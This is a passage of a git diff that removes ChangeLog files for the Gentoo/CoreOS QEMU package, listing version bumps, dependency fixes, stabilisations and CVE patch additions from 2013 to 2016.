qemu-2.6.0.ebuild, qemu-9999.ebuild: - handle bzip2 dep #589968 - - The block layer uses it to support bzip2 compression in dmg images. - That code makes it into softmmu binaries and userland utils. - - 07 Aug 2016; Luca Barbato - +files/qemu-2.6.0-glib-size_t.patch, qemu-2.6.0.ebuild: - Drop a -Werror when it could cause a false positive - - The check code could trigger recent compiler warnings. - - Package-Manager: portage-2.2.26 - - 15 Aug 2016; Luca Barbato files/qemu-binfmt.initd-r1: - Update ppc magic mask - - Unbreak using qemu-user with current stage3. - - Package-Manager: portage-2.3.0 - - 21 Aug 2016; Luca Barbato qemu-9999.ebuild: - Update the languages list - - Package-Manager: portage-2.3.0 - - 21 Aug 2016; Luca Barbato qemu-9999.ebuild: - Drop a patch - - It is already upstreamed. - - Package-Manager: portage-2.3.0 - - 05 Sep 2016; Matthias Maier -qemu-2.5.0-r2.ebuild, - -qemu-2.5.0-r3.ebuild: - remove vulnerable 2.5.0 - - Package-Manager: portage-2.2.28 - -*qemu-2.7.0 (05 Sep 2016) - - 05 Sep 2016; Matthias Maier +qemu-2.7.0.ebuild: - version bump to 2.7.0, various security fixes - - 3af9187fc6caaf415ab9c0c6d92c9678f65cb17f -> CVE-2016-4001, bug #579734 - 3a15cc0e1ee7168db0782133d2607a6bfa422d66 -> CVE-2016-4002, bug #579734 - c98c6c105f66f05aa0b7c1d2a4a3f716450907ef -> CVE-2016-4439, bug #583496 - 6c1fef6b59563cc415f21e03f81539ed4b33ad90 -> CVE-2016-4441, bug #583496 - 06630554ccbdd25780aa03c3548aaff1eb56dffd -> , bug #583952 - 844864fbae66935951529408831c2f22367a57b6 -> CVE-2016-5337, bug #584094 - b60bdd1f1ee1616b7a9aeeffb4088e1ce2710fb2 -> , bug #584102 - 1b85898025c4cd95dce673d15e67e60e98e91731 -> , bug #584146 - 521360267876d3b6518b328051a2e56bca55bef8 -> CVE-2016-4453, bug #584514 - 4e68a0ee17dad7b8d870df0081d4ab2e079016c2 -> CVE-2016-4454, bug #584514 - a6b3167fa0e825aebb5a7cd8b437b6d41584a196 -> CVE-2016-5126, bug #584630 - ff589551c8e8e9e95e211b9d8daafb4ed39f1aec -> CVE-2016-5338, bug #584918 - d3cdc49138c30be1d3c2f83d18f85d9fdee95f1a -> CVE-2016-5238, bug #584918 - 1e7aed70144b4673fc26e73062064b6724795e5f -> , bug #589924 - afd9096eb1882f23929f5b5c177898ed231bac66 -> CVE-2016-5403, bug #589928 - eb700029c7836798046191d62d595363d92c84d4 -> CVE-2016-6835, bug #591244 - ead315e43ea0c2ca3491209c6c8db8ce3f2bbe05 -> CVE-2016-6834, bug #591374 - 6c352ca9b4ee3e1e286ea9e8434bd8e69ac7d0d8 -> CVE-2016-6833, bug #591380 - 47882fa4975bf0b58dd74474329fdd7154e8f04c -> CVE-2016-6888, bug #591678 - - 805b5d98c649d26fc44d2d7755a97f18e62b438a - 56f101ecce0eafd09e2daf1c4eeb1377d6959261 - fff39a7ad09da07ef490de05c92c91f22f8002f2 -> , bug #592430 - - Package-Manager: portage-2.2.28 - - 05 Sep 2016; Matthias Maier - +files/qemu-2.7.0-CVE-2016-6836.patch, qemu-2.7.0.ebuild: - apply patch for CVE-2016-6836, bug #591242 - - Package-Manager: portage-2.2.28 - - 05 Sep 2016; Matthias Maier -qemu-2.6.0.ebuild, - qemu-2.7.0.ebuild: - drop vulnerable 2.6.0 - - Package-Manager: portage-2.2.28 - - 05 Sep 2016; Matthias Maier - -files/qemu-2.5.0-9pfs-segfault.patch, - -files/qemu-2.5.0-CVE-2015-8567.patch, - -files/qemu-2.5.0-CVE-2015-8613.patch, - -files/qemu-2.5.0-CVE-2015-8619.patch, - -files/qemu-2.5.0-CVE-2015-8701.patch, - -files/qemu-2.5.0-CVE-2015-8743.patch, - -files/qemu-2.5.0-CVE-2016-1568.patch, - -files/qemu-2.5.0-CVE-2016-1714.patch, - -files/qemu-2.5.0-CVE-2016-1922.patch, - -files/qemu-2.5.0-CVE-2016-1981.patch, - -files/qemu-2.5.0-CVE-2016-2197.patch, - -files/qemu-2.5.0-CVE-2016-2392.patch, - -files/qemu-2.5.0-ne2000-reg-check.patch, - -files/qemu-2.5.0-usb-ehci-oob.patch, - -files/qemu-2.5.0-usb-ndis-int-overflow.patch, - -files/qemu-2.6.0-crypto-static.patch, -files/qemu-2.6.0-glib-size_t.patch: - drop obsolete patches - - Package-Manager: portage-2.2.28 - - 05 Sep 2016; Matthias Maier qemu-2.7.0.ebuild: - fix installation with USE=python, bug #592908 - - Package-Manager: portage-2.2.28 - - 05 Sep 2016; Agostino Sarubbo qemu-2.7.0.ebuild: - amd64 stable wrt bug #592430 - - Package-Manager: portage-2.2.28 - RepoMan-Options: --include-arches="amd64" - Signed-off-by: Agostino Sarubbo - - 05 Sep 2016; Agostino Sarubbo qemu-2.7.0.ebuild: - x86 stable wrt bug #592430 - - Package-Manager: portage-2.2.28 - RepoMan-Options: --include-arches="x86" - Signed-off-by: Agostino Sarubbo - - 05 Sep 2016; Matthias Maier - -files/qemu-2.5.0-CVE-2015-8558.patch, - -files/qemu-2.5.0-CVE-2016-2198.patch, - -files/qemu-2.5.0-rng-stack-corrupt-0.patch, - -files/qemu-2.5.0-rng-stack-corrupt-1.patch, - -files/qemu-2.5.0-rng-stack-corrupt-2.patch, - -files/qemu-2.5.0-rng-stack-corrupt-3.patch, - -files/qemu-2.5.1-CVE-2015-8558.patch, - -files/qemu-2.5.1-CVE-2016-4020.patch, - -files/qemu-2.5.1-stellaris_enet-overflow.patch, - -files/qemu-2.5.1-xfs-linux-headers.patch, -qemu-2.5.1.ebuild: - drop vulnerable 2.5.1, bug #592430, and 19 others - - Package-Manager: portage-2.2.28 - diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog-2015 b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog-2015 deleted file mode 100644 index 39dc818666..0000000000 --- a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog-2015 +++ /dev/null @@ -1,1536 +0,0 @@ -# ChangeLog for app-emulation/qemu -# Copyright 1999-2015 Gentoo Foundation; Distributed under the GPL v2 -# $Header: /var/cvsroot/gentoo-x86/app-emulation/qemu/ChangeLog,v 1.348 2015/08/05 06:47:50 vapier Exp $ - - 05 Aug 2015; Mike Frysinger qemu-9999.ebuild: - Allow disabling of all user & softmmu targets so that the ebuild only installs - the various helper tools #556712 by Matthew Thode. - - 05 Aug 2015; Mike Frysinger qemu-2.3.0-r5.ebuild, - qemu-9999.ebuild: - Move seabios bin clean up under the softmmu check since user tools do not - install blobs. - - 05 Aug 2015; Mike Frysinger qemu-9999.ebuild: - Unify target logic a bit. - - 04 Aug 2015; Agostino Sarubbo qemu-2.3.0-r5.ebuild: - Stable for x86, wrt bug #556630 - - 04 Aug 2015; Agostino Sarubbo qemu-2.3.0-r5.ebuild: - Stable for amd64, wrt bug #556630 - - 03 Aug 2015; Doug Goldstein -qemu-2.2.1-r2.ebuild, - -qemu-2.3.0-r1.ebuild, -qemu-2.3.0-r2.ebuild, -qemu-2.3.0-r3.ebuild: - Remove older versions due to vulnerabilities. - -*qemu-2.3.0-r5 (03 Aug 2015) - - 03 Aug 2015; Doug Goldstein - +files/qemu-2.3.0-CVE-2015-5165-1.patch, - +files/qemu-2.3.0-CVE-2015-5165-2.patch, - +files/qemu-2.3.0-CVE-2015-5165-3.patch, - +files/qemu-2.3.0-CVE-2015-5165-4.patch, - +files/qemu-2.3.0-CVE-2015-5165-5.patch, - +files/qemu-2.3.0-CVE-2015-5165-6.patch, - +files/qemu-2.3.0-CVE-2015-5165-7.patch, - +files/qemu-2.3.0-CVE-2015-5166.patch, +qemu-2.3.0-r5.ebuild: - bump to fix CVE-2015-5165 and CVE-2015-5166. bug #556304 - - 28 Jul 2015; Agostino Sarubbo qemu-2.3.0-r4.ebuild: - Stable for x86, wrt bug #556052 - - 28 Jul 2015; Agostino Sarubbo qemu-2.3.0-r4.ebuild: - Stable for amd64, wrt bug #556052 - -*qemu-2.3.0-r4 (27 Jul 2015) - - 27 Jul 2015; Doug Goldstein - +files/qemu-2.3.0-CVE-2015-3214.patch, - +files/qemu-2.3.0-CVE-2015-5154-1.patch, - +files/qemu-2.3.0-CVE-2015-5154-2.patch, - +files/qemu-2.3.0-CVE-2015-5154-3.patch, +qemu-2.3.0-r4.ebuild: - Fix for CVE-2015-3214, handle out-of-bounds memory access when reading from - the PIT Mode/Command register. Fix for CVE-2015-5154, handle ATAPI heap - overflow during I/O access. - -*qemu-2.3.0-r3 (25 Jul 2015) - - 25 Jul 2015; Doug Goldstein - +files/qemu-2.3.0-CVE-2015-5158.patch, +qemu-2.3.0-r3.ebuild: - Add fix from upstream for CVE-2015-5158 #555680 by Agostino Sarubbo. - - 25 Jul 2015; Doug Goldstein qemu-9999.ebuild: - Upstream made VNC WebSockets unconditional. As of commit - 8e9b0d24fb986d4241ae3b77752eca5dab4cb486 --{enable,disable}-vnc-wc - has been removed. Thanks to Daniel Scharrer for - noticing this. fixes bug #555834 - - 20 Jul 2015; Mike Frysinger metadata.xml: - Use the herd tag only so people assign bugs correctly. - - 20 Jul 2015; Mike Frysinger metadata.xml, - qemu-9999.ebuild: - Drop quorum configure flag to match upstream which made it unconditional - #554274 by Guy. - - 06 Jul 2015; Mike Frysinger metadata.xml, - qemu-9999.ebuild: - Add USE=vte to control the dep explicitly and fix SLOT handling for diff gtk - versions #545158 by nzqr. - - 06 Jul 2015; Agostino Sarubbo qemu-2.3.0-r2.ebuild: - Stable for x86, wrt bug #551752 - - 06 Jul 2015; Agostino Sarubbo qemu-2.3.0-r2.ebuild: - Stable for amd64, wrt bug #551752 - -*qemu-2.3.0-r2 (12 Jun 2015) - - 12 Jun 2015; Mike Frysinger - +files/qemu-2.3.0-CVE-2015-3209.patch, +qemu-2.3.0-r2.ebuild: - Add fix from upstream for CVE-2015-3209 #551752 by Agostino Sarubbo. - - 16 May 2015; Mike Frysinger qemu-9999.ebuild: - Require mesa[gles2] for USE=opengl to match upstream #549558 by Michal - Privoznik. - - 14 May 2015; Agostino Sarubbo - -files/qemu-2.1.1-readlink-self.patch, - -files/qemu-2.1.2-vnc-sanitize-bits.patch, -qemu-2.1.2-r2.ebuild, - -qemu-2.1.3-r1.ebuild, -qemu-2.1.3.ebuild, -qemu-2.2.0.ebuild, - -qemu-2.2.1-r1.ebuild, -qemu-2.2.1.ebuild, -qemu-2.3.0.ebuild, - qemu-2.2.1-r2.ebuild: - Stable for amd64/x86 - remove old. - - 14 May 2015; Mike Frysinger qemu-9999.ebuild: - Drop kvm warning as it has been ~1 year now since the changes landed. - - 13 May 2015; Mike Frysinger metadata.xml, - qemu-9999.ebuild: - Add USE=sdl2 to prefer libsdl2 over libsdl #547306 by Nikoli. - - 13 May 2015; Mike Frysinger - +files/qemu-2.3.0-CVE-2015-3456.patch, qemu-2.1.3-r1.ebuild, - qemu-2.2.1-r2.ebuild, qemu-2.3.0-r1.ebuild: - Move patch to $FILESDIR as it is small and matches what we do everywhere else. - -*qemu-2.2.1-r2 (13 May 2015) -*qemu-2.3.0-r1 (13 May 2015) -*qemu-2.1.3-r1 (13 May 2015) - - 13 May 2015; Robin H. Johnson +qemu-2.1.3-r1.ebuild, - +qemu-2.2.1-r2.ebuild, +qemu-2.3.0-r1.ebuild: - Security bugfix for CVE-2015-3456 / VENOM. - - 05 May 2015; Mike Frysinger -files/qemu-9999-cflags.patch, - -files/qemu-9999-virtfs-proxy-helper-accept.patch, -files/qemu-kvm-1.4: - Drop files no longer referenced by ebuilds. - -*qemu-2.3.0 (28 Apr 2015) - - 28 Apr 2015; Mike Frysinger +qemu-2.3.0.ebuild, - qemu-9999.ebuild: - Version bump. - -*qemu-2.2.1-r1 (12 Apr 2015) - - 12 Apr 2015; Mike Frysinger - +files/qemu-2.2.1-CVE-2015-1779-1.patch, - +files/qemu-2.2.1-CVE-2015-1779-2.patch, +qemu-2.2.1-r1.ebuild: - Add fixes from upstream for CVE-2015-1779 #544328 by Agostino Sarubbo. - - 08 Apr 2015; Michał Górny qemu-2.1.2-r2.ebuild, - qemu-2.1.3.ebuild, qemu-2.2.0.ebuild, qemu-2.2.1.ebuild: - Remove old Python implementations - - 05 Apr 2015; Matthias Maier qemu-2.1.3.ebuild, - qemu-2.2.0.ebuild: - Ebuild maintenance: Remove backports SRC_URI to my devspace where not needed - - 04 Apr 2015; Mike Frysinger metadata.xml, - qemu-9999.ebuild: - Add USE=gtk2 so people can force older GTK versions #545158 by nzqr. - - 28 Mar 2015; Mike Frysinger qemu-9999.ebuild: - Put softmmu/user deps behind the respective flags so we do not pull in one set - when they are not enabled #538958 by Anthoine Bourgeois. - - 25 Mar 2015; Agostino Sarubbo qemu-2.2.0.ebuild: - Stable for x86, wrt bug #542910 - - 16 Mar 2015; Mike Frysinger qemu-9999.ebuild: - Handle renamed opengl configure flag #543386 by Chase Rayfield. - - 12 Mar 2015; Agostino Sarubbo qemu-2.2.0.ebuild: - Stable for amd64, wrt bug #542910 - -*qemu-2.2.1 (11 Mar 2015) - - 11 Mar 2015; Mike Frysinger +qemu-2.2.1.ebuild, - qemu-9999.ebuild: - Version bump #542900 by Thomas Stein. - - 28 Feb 2015; Andrew Savchenko metadata.xml: - seccomp USE flag is now global, removing from metadata - -*qemu-2.1.3 (27 Jan 2015) - - 27 Jan 2015; Matthias Maier +qemu-2.1.3.ebuild, - qemu-2.1.2-r2.ebuild, qemu-2.2.0.ebuild: - version bump, bug #537648 - - 21 Dec 2014; Matthias Maier -qemu-2.1.2-r1.ebuild: - drop vulnerable, bug #531666 (CVE-2014-8106) - - 21 Dec 2014; Agostino Sarubbo qemu-2.1.2-r2.ebuild: - Stable for x86, wrt bug #531666 - - 21 Dec 2014; Agostino Sarubbo qemu-2.1.2-r2.ebuild: - Stable for amd64, wrt bug #531666 - -*qemu-2.1.2-r2 (14 Dec 2014) - - 14 Dec 2014; Matthias Maier +qemu-2.1.2-r2.ebuild: - backport fixes for bugs #530498, #531666 (CVE-2014-8106), #529030 - (CVE-2014-7840), #528922 (528922) - -*qemu-2.2.0 (14 Dec 2014) - - 14 Dec 2014; Matthias Maier +qemu-2.2.0.ebuild, - metadata.xml: - version bump; cleanup whitespace in metadata.xml - - 11 Dec 2014; Michał Górny qemu-2.1.2-r1.ebuild, - qemu-9999.ebuild: - Add missing udev_reload call in case udev rules are installed, fixes - https://bugs.funtoo.org/browse/FL-1626. - - 08 Nov 2014; Agostino Sarubbo - -files/qemu-2.1.0-CVE-2014-5388.patch, -qemu-2.1.0-r1.ebuild, - -qemu-2.1.1.ebuild, -qemu-2.1.2.ebuild: - Remove old - - 08 Nov 2014; Agostino Sarubbo qemu-2.1.2-r1.ebuild: - Stable for x86, wrt bug #527088 - - 08 Nov 2014; Agostino Sarubbo qemu-2.1.2-r1.ebuild: - Stable for amd64, wrt bug #527088 - - 02 Nov 2014; Sven Vermeulen qemu-2.1.1.ebuild, - qemu-2.1.2-r1.ebuild, qemu-2.1.2.ebuild, qemu-9999.ebuild: - Remove sec-policy/selinux-* dependency from DEPEND but keep in RDEPEND (bug - #527698) - -*qemu-2.1.2-r1 (31 Oct 2014) - - 31 Oct 2014; Mike Frysinger - +files/qemu-2.1.2-vnc-sanitize-bits.patch, +qemu-2.1.2-r1.ebuild: - Add fix from upstream for vnc arg sanitizing #527088 by Agostino Sarubbo. - - 23 Oct 2014; Agostino Sarubbo qemu-2.1.1.ebuild: - Stable for x86, wrt bug #522364 - - 23 Oct 2014; Agostino Sarubbo qemu-2.1.1.ebuild: - Stable for amd64, wrt bug #522364 - -*qemu-2.1.2 (16 Oct 2014) - - 16 Oct 2014; Mike Frysinger +qemu-2.1.2.ebuild: - Version bump #523428 by Agostino Sarubbo. - - 26 Sep 2014; Mike Gilbert qemu-2.1.1.ebuild, - qemu-9999.ebuild: - Utilize PYTHON_REQUIRED_USE unconditionally. We always need at least one - python version enabled for building. - - 13 Sep 2014; Agostino Sarubbo - -files/qemu-2.0.0-CVE-2013-4541.patch, -files/qemu-2.0.0-CVE-2014-0222.patch, - -files/qemu-2.0.0-CVE-2014-0223.patch, - -files/qemu-2.0.0-qcow-check-max-sizes.patch, - -files/qemu-2.0.0-usb-post-load-checks.patch, -qemu-2.0.0-r1.ebuild, - -qemu-2.1.0.ebuild: - Remove old - - 13 Sep 2014; Agostino Sarubbo qemu-2.1.0-r1.ebuild: - Stable for x86, wrt bug #520688 - - 13 Sep 2014; Agostino Sarubbo qemu-2.1.0-r1.ebuild: - Stable for amd64, wrt bug #520688 - -*qemu-2.1.1 (12 Sep 2014) - - 12 Sep 2014; Mike Frysinger - +files/qemu-2.1.1-readlink-self.patch, +qemu-2.1.1.ebuild: - Version bump. - - 06 Sep 2014; Mike Frysinger qemu-2.1.0-r1.ebuild, - qemu-9999.ebuild: - Move USE=xattr logic to common code path since qemu-user uses it too #522202 - by Thomas Reitmayr. - - 28 Aug 2014; Mike Frysinger qemu-2.1.0-r1.ebuild, - qemu-9999.ebuild: - Mark u-boot binaries as prebuilt #521286 by Agostino Sarubbo. - - 28 Aug 2014; Mike Frysinger - +files/qemu-2.1.0-CVE-2014-5388.patch, -files/CVE-2014-5388.patch, - qemu-2.1.0-r1.ebuild: - Clean up CVE patch #520688 by Agostino Sarubbo. - -*qemu-2.1.0-r1 (27 Aug 2014) - - 27 Aug 2014; Agostino Sarubbo +files/CVE-2014-5388.patch, - +qemu-2.1.0-r1.ebuild: - Fix CVE-2014-5388 wrt bug #520688 - - 27 Aug 2014; Patrick Lauer metadata.xml: - Remove unneeded useflag description from metadata.xml - - 26 Aug 2014; Agostino Sarubbo -qemu-1.4.2.ebuild, - -qemu-1.5.3.ebuild, -qemu-1.6.0-r1.ebuild, -qemu-1.6.1.ebuild, - -qemu-1.6.2.ebuild, -qemu-1.7.0.ebuild, -qemu-1.7.1.ebuild, - -qemu-2.0.0.ebuild: - Remove old - - 20 Aug 2014; Agostino Sarubbo qemu-2.0.0-r1.ebuild: - Stable for x86, wrt bug #510208 - - 20 Aug 2014; Agostino Sarubbo qemu-2.0.0-r1.ebuild: - Stable for amd64, wrt bug #510208 - - 11 Aug 2014; Mike Frysinger qemu-2.0.0-r1.ebuild: - Hack lzo/snappy flags in the older release #519520 by Luis Ressel. - - 08 Aug 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-2.1.0.ebuild, qemu-9999.ebuild: - Require new enough libnfs #519226 by Mirko Guenther. - - 05 Aug 2014; Mike Frysinger metadata.xml, - qemu-2.1.0.ebuild, qemu-9999.ebuild: - Add USE=pin-upstream-blobs so people can opt to use any version of - seabios/etc... on their local systems. - - 05 Aug 2014; Mike Frysinger qemu-2.1.0.ebuild, - qemu-9999.ebuild: - Unify configure lists so that we disable all the softmmu flags when building - the user targets to avoid automagic deps leaking in. - - 05 Aug 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-2.1.0.ebuild, qemu-9999.ebuild: - Add USE=infiniband to control librdma automagic dep. - - 05 Aug 2014; Mike Frysinger metadata.xml, - qemu-2.1.0.ebuild, qemu-9999.ebuild: - Add USE=numa to control numactl automagic dep. - - 05 Aug 2014; Mike Frysinger metadata.xml, - qemu-2.0.0-r1.ebuild, qemu-2.1.0.ebuild, qemu-9999.ebuild: - Add USE=lzo/snappy to control liblzo/snappy automagic deps. - - 05 Aug 2014; Mike Frysinger metadata.xml, - qemu-2.0.0-r1.ebuild, qemu-2.1.0.ebuild, qemu-9999.ebuild: - Add USE=nfs to control libnfs automagic dep. - - 05 Aug 2014; Mike Frysinger metadata.xml, - qemu-2.0.0-r1.ebuild, qemu-2.0.0.ebuild, qemu-2.1.0.ebuild, qemu-9999.ebuild: - Control quorum via USE=tls since it also relies on gnutls. - - 04 Aug 2014; Mike Frysinger files/qemu-binfmt.initd-r1: - actually use the new $QEMU_BINFMT_FLAGS - -*qemu-2.1.0 (04 Aug 2014) - - 04 Aug 2014; Mike Frysinger +qemu-2.1.0.ebuild, - files/qemu-binfmt.initd-r1: - Version bump #518806 by José Romildo Malaquias. Add aarch64 to the init - script, and switch flags from P to OC until qemu itself can understand the - extra argv[0] #512780 by Bertrand Jacquin. - - 29 Jul 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-9999.ebuild: - Do not try to mung blobs when they are not installed. - - 29 Jul 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-9999.ebuild: - Add USE=nls support #515544 by Nikoli. - - 29 Jul 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-9999.ebuild: - Do not attempt to set fcaps on virtfs-proxy-helper when it does not exist - #516874 by Joakim Tjernlund. - - 29 Jul 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-9999.ebuild: - Update PaX markings on system binaries before executing tests with them - #515550 by Nikoli. - - 06 Jun 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-2.0.0.ebuild, qemu-9999.ebuild: - Disable mprotect on qemu binaries #459348 by Alon Bar-Lev. - - 04 Jun 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-2.0.0.ebuild, qemu-9999.ebuild: - Fix src_test when softmmu is disabled. Fix install of test results when - generating them failed #512010 by Markus Oehme. - - 04 Jun 2014; Agostino Sarubbo qemu-2.0.0.ebuild: - Stable for x86, wrt bug #507796 - - 04 Jun 2014; Agostino Sarubbo qemu-2.0.0.ebuild: - Stable for amd64, wrt bug #507796 - - 04 Jun 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-2.0.0.ebuild, qemu-9999.ebuild: - Check for config files still using `qemu-kvm`. - - 31 May 2014; Mike Frysinger qemu-2.0.0-r1.ebuild, - qemu-2.0.0.ebuild: - Update seabios dep to match what is included in the source #510680 by Pat - Erley. - -*qemu-2.0.0-r1 (31 May 2014) - - 31 May 2014; Mike Frysinger - +files/qemu-2.0.0-CVE-2013-4541.patch, +files/qemu-2.0.0-CVE-2014-0222.patch, - +files/qemu-2.0.0-CVE-2014-0223.patch, - +files/qemu-2.0.0-qcow-check-max-sizes.patch, - +files/qemu-2.0.0-usb-post-load-checks.patch, +qemu-2.0.0-r1.ebuild: - Add fixes from upstream for various CVEs #510208 #510234. - - 31 May 2014; Mike Frysinger qemu-2.0.0.ebuild, - qemu-9999.ebuild: - Drop qemu-kvm wrapper entirely and tell people to use -enable-kvm instead. - #506566 by nobody. - - 18 May 2014; Mike Frysinger qemu-2.0.0.ebuild, - qemu-9999.ebuild: - Set --cxx unconditionally. - - 12 May 2014; Mike Frysinger qemu-9999.ebuild: - Drop patch now that it is merged upstream #510068 by Hristo Venev. - - 25 Apr 2014; Mike Frysinger qemu-2.0.0.ebuild, - qemu-9999.ebuild: - Fix static lib requirements for USE=static-user #487918 by jannis. - - 25 Apr 2014; Mike Frysinger qemu-2.0.0.ebuild, - qemu-9999.ebuild: - Simplify style for generating USE flags and configure options -- should be no - functional changes here. - - 22 Apr 2014; Mike Frysinger qemu-2.0.0.ebuild, - qemu-9999.ebuild: - Add aarch64 targets. - - 20 Apr 2014; Mike Frysinger qemu-1.7.0.ebuild, - qemu-1.7.1.ebuild, qemu-2.0.0.ebuild, qemu-9999.ebuild: - Drop USE=mixemu as the configure flag no longer exists #508194 by OGINO - Masanori. - -*qemu-2.0.0 (19 Apr 2014) - - 19 Apr 2014; Mike Frysinger +qemu-2.0.0.ebuild: - Version bump. - - 19 Apr 2014; Mike Frysinger - +files/qemu-9999-virtfs-proxy-helper-accept.patch, qemu-9999.ebuild: - Fix by Tim Comer for stack overflow in virtfs-proxy-helper #486714. - - 19 Apr 2014; Mike Frysinger qemu-1.4.2.ebuild, - qemu-1.5.3.ebuild, qemu-1.6.0-r1.ebuild, qemu-1.6.1.ebuild, qemu-1.6.2.ebuild, - qemu-1.7.0.ebuild, qemu-1.7.1.ebuild, qemu-9999.ebuild: - Export a sane default AR #484974 by Agostino Sarubbo. - - 19 Apr 2014; Mike Frysinger qemu-1.4.2.ebuild, - qemu-1.5.3.ebuild, qemu-1.6.0-r1.ebuild, qemu-1.6.1.ebuild, qemu-1.6.2.ebuild, - qemu-1.7.0.ebuild, qemu-1.7.1.ebuild, qemu-9999.ebuild: - Move python_export_best call to src_configure to avoid binpkg issues #496554 - by Rafal Kupiec. - -*qemu-1.7.1 (19 Apr 2014) - - 19 Apr 2014; Mike Frysinger +qemu-1.7.1.ebuild: - Version bump. - - 24 Mar 2014; Samuli Suominen metadata.xml, - qemu-1.4.2.ebuild, qemu-1.5.3.ebuild, qemu-1.6.0-r1.ebuild, qemu-1.6.1.ebuild, - qemu-1.6.2.ebuild, qemu-1.7.0.ebuild, qemu-9999.ebuild: - Replace dependency to libusbx >= 1.0.13 with libusb >= 1.0.18 (because this is - where the libusbx code moved) - - 24 Feb 2014; Pawel Hajdan jr qemu-1.5.3.ebuild: - x86 stable wrt bug #483760 - - 19 Jan 2014; Doug Goldstein qemu-1.7.0.ebuild: - Nudge the SeaBIOS depend to the correct version for this release. - - 19 Jan 2014; Doug Goldstein -qemu-1.5.2-r1.ebuild, - -qemu-1.5.2-r2.ebuild, -qemu-1.6.0.ebuild: - Cull some older versions - -*qemu-1.7.0 (19 Dec 2013) -*qemu-1.6.2 (19 Dec 2013) - - 19 Dec 2013; Mike Frysinger - +files/qemu-1.7.0-cflags.patch, +qemu-1.6.2.ebuild, +qemu-1.7.0.ebuild, - qemu-9999.ebuild: - Version bumps. - -*qemu-1.6.1 (21 Oct 2013) - - 21 Oct 2013; Doug Goldstein +qemu-1.6.1.ebuild, - metadata.xml: - Version bump. Fixes CVE-2013-4377 (bug #486352). Fix automagic depend on - libssh2 (bug #487918). Fix automagic depend on libusbx (bug #487810) - -*qemu-1.6.0-r1 (17 Sep 2013) - - 17 Sep 2013; Doug Goldstein +qemu-1.6.0-r1.ebuild: - Initial work on the 1.6.x stable patch queue. - - 15 Sep 2013; Agostino Sarubbo qemu-1.5.3.ebuild: - Stable for amd64, wrt bug #483760 - - 06 Sep 2013; Doug Goldstein qemu-1.6.0.ebuild: - arm, microblaze, ppc, and ppc64 softmmu targets require USE=fdt, patch from - Mike Gilbert fixes bug #482878 - - 05 Sep 2013; Michał Górny qemu-1.4.2.ebuild, - qemu-1.5.2-r1.ebuild, qemu-1.5.2-r2.ebuild, qemu-1.5.3.ebuild, - qemu-1.6.0.ebuild, qemu-9999.ebuild: - Clean up PYTHON_COMPAT from old implementations. - -*qemu-1.5.3 (27 Aug 2013) - - 27 Aug 2013; Doug Goldstein +qemu-1.5.3.ebuild: - Version bump - - 19 Aug 2013; Doug Goldstein qemu-9999.ebuild: - SeaBIOS/VGABios/sgabios are not meant to be a versioned depend for the live - ebuild. bug #481594 - - 19 Aug 2013; Doug Goldstein qemu-1.5.2-r1.ebuild, - qemu-1.5.2-r2.ebuild, qemu-1.6.0.ebuild: - Fix dependency on sys-apps/dtc due to internal copy of fdt_env.h in QEMU - sources. bug #480680 - - 17 Aug 2013; Sergei Trofimovich qemu-9999.ebuild: - Conditionalize '--enable-migration-from-qemu-kvm' (not an upstream option). - -*qemu-1.6.0 (16 Aug 2013) - - 16 Aug 2013; Doug Goldstein +qemu-1.6.0.ebuild, - qemu-9999.ebuild: - Version bump - - 14 Aug 2013; Patrick Lauer metadata.xml, - qemu-1.5.2-r1.ebuild, qemu-1.5.2-r2.ebuild: - Remove unneded useflag description, fix repoman whitespace warnings - - 14 Aug 2013; Doug Goldstein -qemu-1.5.2.ebuild: - Remove older version - -*qemu-1.5.2-r2 (14 Aug 2013) - - 14 Aug 2013; Doug Goldstein +qemu-1.5.2-r2.ebuild, - -qemu-1.4.1.ebuild, -qemu-1.4.2-r1.ebuild: - Bump the stable patchset. - - 04 Aug 2013; Doug Goldstein qemu-9999.ebuild: - Fix libseccomp depend for master. bug #479562 - -*qemu-1.5.2-r1 (03 Aug 2013) - - 03 Aug 2013; Doug Goldstein +qemu-1.5.2-r1.ebuild, - metadata.xml: - Version bump to include my tested stable patchset. Add support for GlusterFS, - bug #468726 - -*qemu-1.5.2 (27 Jul 2013) - - 27 Jul 2013; Doug Goldstein +qemu-1.5.2.ebuild, - -qemu-1.5.1.ebuild: - Version bump and start of the Gentoo patchset. - - 27 Jul 2013; Doug Goldstein - -files/qemu-1.2.0-cflags.patch, -files/qemu-binfmt.initd, -files/qemu-kvm, - -qemu-1.2.2-r2.ebuild, -qemu-1.2.2-r3.ebuild, -qemu-1.2.2-r4.ebuild, - -qemu-1.4.0-r1.ebuild: - Cull old versions and old files from the tree - - 27 Jul 2013; Doug Goldstein qemu-1.4.2-r1.ebuild: - Fix static-user builds needing to depend on glib with USE=static-libs. bug - #478138 - -*qemu-1.4.2-r1 (27 Jul 2013) - - 27 Jul 2013; Doug Goldstein +qemu-1.4.2-r1.ebuild: - Fix qxl rom size from old migrations. Fix rtl8139 large copies on Windows. Fix - large copy and pastes with SPICE. Fix inability to disable all softmmu targets - (bug #466806). Utilize readme.eclass. Other misc cleanups from 1.5.x ebuild. - - 26 Jul 2013; Sergei Trofimovich qemu-9999.ebuild: - Fix configure phase. NPTL is not a user-configurable feature anymore. - -*qemu-1.5.1 (19 Jul 2013) - - 19 Jul 2013; Doug Goldstein +qemu-1.5.1.ebuild: - Really need to get started on qemu 1.5.x - - 19 Jul 2013; Doug Goldstein qemu-1.4.2.ebuild: - Swore this already was committed but I guess not. Fix depends for generating - the man pages and documentation. bug #477106 - - 25 Jun 2013; Agostino Sarubbo qemu-1.4.2.ebuild: - Stable for amd64, wrt bug #473426 - - 25 Jun 2013; Agostino Sarubbo qemu-1.4.2.ebuild: - Stable for x86, wrt bug #473426 - - 22 Jun 2013; Sergei Trofimovich qemu-9999.ebuild: - Adjust 